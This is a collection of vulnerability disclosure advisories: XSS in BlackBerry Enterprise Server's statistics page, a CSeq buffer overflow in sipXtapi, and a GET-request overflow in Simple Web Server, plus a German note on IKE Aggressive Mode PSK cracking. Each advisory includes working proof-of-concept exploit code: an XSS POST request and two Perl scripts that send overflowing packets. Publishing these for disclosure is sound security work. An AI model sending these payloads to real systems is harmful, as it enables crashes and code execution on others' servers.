Advisories

Author: Michael Thumann

1. Summary
The Blackberry Mobile Data Service Connection is vulnerable to
several XSS attacks in the "Customize Statistics Page".

2. CVSS V2 Base Score : 3.5 (based on vendor rating)

3. Products affected
Blackberry Enterprise Server: all versions prior to 4.1.6 MR4

4. Patch Availability : A patch is available from the vendor.

5. Details
Injecting scripts (containing standard and encoded XSS attacks) into all the fields of the "customize statitics page" reveals that none of the fields are properly validated for malicious input and the output isn't sanitized.

6. Solution Update the affected products to the actual version.

7. Time-Line
16 Feb 2009: Discovery of the vulnerability
02 Mar 2009: Vulnerability reported to vendor
02 Mar 2009: Answer from vendor
16 Apr 2009: Patch available
16 Apr 2009: Public Disclosure

8. Exploit
POST /admin/statistics/ConfigureStatistics HTTP/1.0
Cookie: JSESSIONID=....
Content-Length: 753
Accept: */*
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Win32)
Host: ...
Content-Type: application/x-www-form-urlencoded
Referer: http://x:8080/admin/statistics/ConfigureStatistics

customDate=%3E%22%27%3E%3Cscript%3Ealert%28782%29%3C%2Fscript%3E&
interval=%3E%22%27%3E%3Cscript%3Ealert%28782%29%3C%2Fscript%3E&
lastCustomInterval=%3E%22%27%3E%3Cscript%3Ealert%28782%29%3C%2Fscript%3E
&lastIntervalLength=%3E%22%27%3E%3Cscript%3Ealert%28782%29%3C%2Fscript%
3E&nextCustomInterval=%3E%22%27%3E%3Cscript%3Ealert%28782%29%3C%2Fscript
%3E&nextIntervalLength=%3E%22%27%3E%3Cscript%3Ealert%28782%29%3C%
2Fscript%3E&action=%3E%22%27%3E%3Cscript%3Ealert%28782%29%3C%2Fscript%3E
&delIntervalIndex=%3E%22%27%3E%3Cscript%3Ealert%28782%29%3C%2Fscript%3E&
addStatIndex=%3E%22%27%3E%3Cscript%3Ealert%28782%29%3C%2Fscript%3E&
delStatIndex=%3E%22%27%3E%3Cscript%3Ealert%28782%29%3C%2Fscript%3E&
referenceTime=%3E%22%27%3E%3Cscript%3Ealert%28782%29%3C%2Fscript%3E

9. Thanks
We would like to thank the guys from Blackberry for working
together on this issue in a professional and responsible way.

10. Disclaimer
The informations in this advisory are provided "AS IS"
without warranty of any kind. In no event shall the authors be liable
for any damages whatsoever including direct, indirect, incidental,
consequential, loss of business profits or special damages due to the
misuse of any information provided in this advisory.

Cf.: www.blackberry.com

Buffer Overflow in SIP Foundry's SipXtapi

Author:
Michael Thumann "mthumann(at)ernw.de"
Homepage: www.ernw.de

1. Summary:
The sipXtapi library from sip foundry contains a buffer overflow when parsing the CSeq field.
This flaw can be used by an attacker to gain control over EIP and execute arbitrary code.

2. Severity : Critical

3. Products affected
- sipXtapi: all version compiled before 24 of march 2006
- PingTel products
- AOL Triton

4. Patch Availability :
A patch is available within the source tree and the affected products of PingTel and AOL have beed updated.

5. Details
Sending a CSeq field value greater than 24 bytes triggers the buffer ovlerflow condition.

6. Solution
Update the affected products to the actual version.

7. Time-Line
20 Mar 2006: Vulnerability reported to vendor 20 Mar 2006: Answer from vendor
24 Mar 2006: Patch available
10 July 2006: Public Disclosure

8. Exploit
#!/usr/bin/perl
# PoC Exploit By mthumann@ernw.de
# Remote Buffer Overflow in sipXtapi

use IO::Socket;
#use strict;


print "sipXtapi Exploit by Michael Thumann \n\n";

if (not $ARGV[0]) {
print "Usage: sipx.pl \n"; exit;}

$target=$ARGV[0];
my $source ="127.0.0.1";
my $target_port = 5060;
my $user ="bad";
my $eip="\x41\x41\x41\x41";
my $cseq =
"\x31\x31\x35\x37\x39\x32\x30\x38".
"\x39\x32\x33\x37\x33\x31\x36\x31".
"\x39\x35\x34\x32\x33\x35\x37\x30".
$eip;
my $packet =<INVITE sip:user\@$source SIP/2.0\r
To: \r
Via: SIP/2.0/UDP $target:3277\r
From: "moz"\r
Call-ID: 3121$target\r
CSeq: $cseq\r
Max-Forwards: 70\r
Contact: \r
\r
END

print "Sending Packet to: " . $target . "\n\n"; socket(PING, PF_INET, SOCK_DGRAM, getprotobyname("udp")); my $ipaddr = inet_aton($target); my $sendto = sockaddr_in($target_port,$ipaddr);
send(PING, $packet, 0, $sendto) == length($packet) or die "cannot send to $target : $target_port : $!\n"; print "Done.\n";

9. Thanks
We would like to thank the guys from sip foundry for working together on this issue in a professional and responsible way.

10. Disclaimer
The informations in this advisory are provided "AS IS" without warranty of any kind. In no event shall the authors be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages due to the misuse of any information provided in this advisory.

Author:
Michael Thumann

1. Summary:
Simple Web Server doesn't do proper bounds checking handling normal GET requests.
Sending an overlong page or script name, it causes an buffer overflow and an attacker
can controll the EIP to run arbitrary code on the victims machine.

2. Severity : Critical

3. Systems affected
The vulnerability was testest with Simple Web Server 1.0

4. Patch Availability :
No patch available

5. Details
The follwoing request causes Simple Web Server to crash:

GET /AAAAAA.....AAAA with 260 As

A Proof of Concept Code is published with this Advisory

6. Solution
Use another web server ;-)

7. Time-Line
17 Feb 2005: Vulnerability reported to vendor
28 Feb 2005: 2nd report because the vendor didn't respond
07 Mar 2005: 3rd mail sent to thre vendor - vendor didn't respond
18 Apr 2005: Public Disclosure

8. Exploit

!/usr/bin/perl
DoS Exploit By mthumann@ernw.de
Tested against WinXP + SP2
Remote Buffer Overflow in PMSoftware Simple Web Server 1.0.15
buffer[250]

use Socket;
print "PMSoftware Simple Web Server Exploit by Michael Thumann \n\n";

if (not $ARGV[0]) {
print "Usage: swsexploit.pl <host>\n";exit;}

$ip=$ARGV[0];

print "Sending Shellcode to: " . $ip . "\n\n"; my $testcode=
"ERNWAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
"BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB".
"CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC".
"DDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDD".
"EEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEE".
"FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF".
"ABCDEFGHIJAAAA"; #EIP =41414141

my $attack="GET /".$testcode." HTTP/1.1\n" ;

$target= inet_aton($ip) || die("inet_aton problems");
socket(S,PF_INET,SOCK_STREAM,getprotobyname('tcp')||0) ||
die("Socket problems\n");
if(connect(S,pack "SnA4x8",2,80,$target)){
select(S);
$|=1;
print $attack;
my @in=<S>;
select(STDOUT);
close(S);
} else { die("Can't connect...\n"); }

9. Disclaimer
The informations in this advisory are provided "AS IS" without warranty
of any kind. In no event shall the authors be liable for any damages
whatsoever including direct, indirect, incidental, consequential,
loss of business profits or special damages due to the misuse of any
information provided in this advisory.

Wird eine VPN-Verbindung im schnellen Aggressive Mode aufgebaut und zur Authentifizierung statt Zertifikaten ein Passwort (Pre-Shared Key, PSK) verwendet, so geht dessen Hash-Wert im Klartext über die Leitung. Mit einem speziellen Sniffer können Angreifer diesen Hash-Wert mitlesen und anschließend mit einer Wörterbuchattacke oder per Brute-Force das Passwort ermitteln. Das Dokument "PSK Cracking using IKE Aggressive Mode" beschreibt ein Beispielszenario, wie man einen Angriff durchführt und wie man sein VPN sichererer konfiguriert. Ob das eigene VPN-Gateway verwundbar ist, kann man mit dem Tool IKEProbe testen.

http://www.heise.de/security/artikel/44947

http://www.heise.de/security/tools/default.shtml?prg=57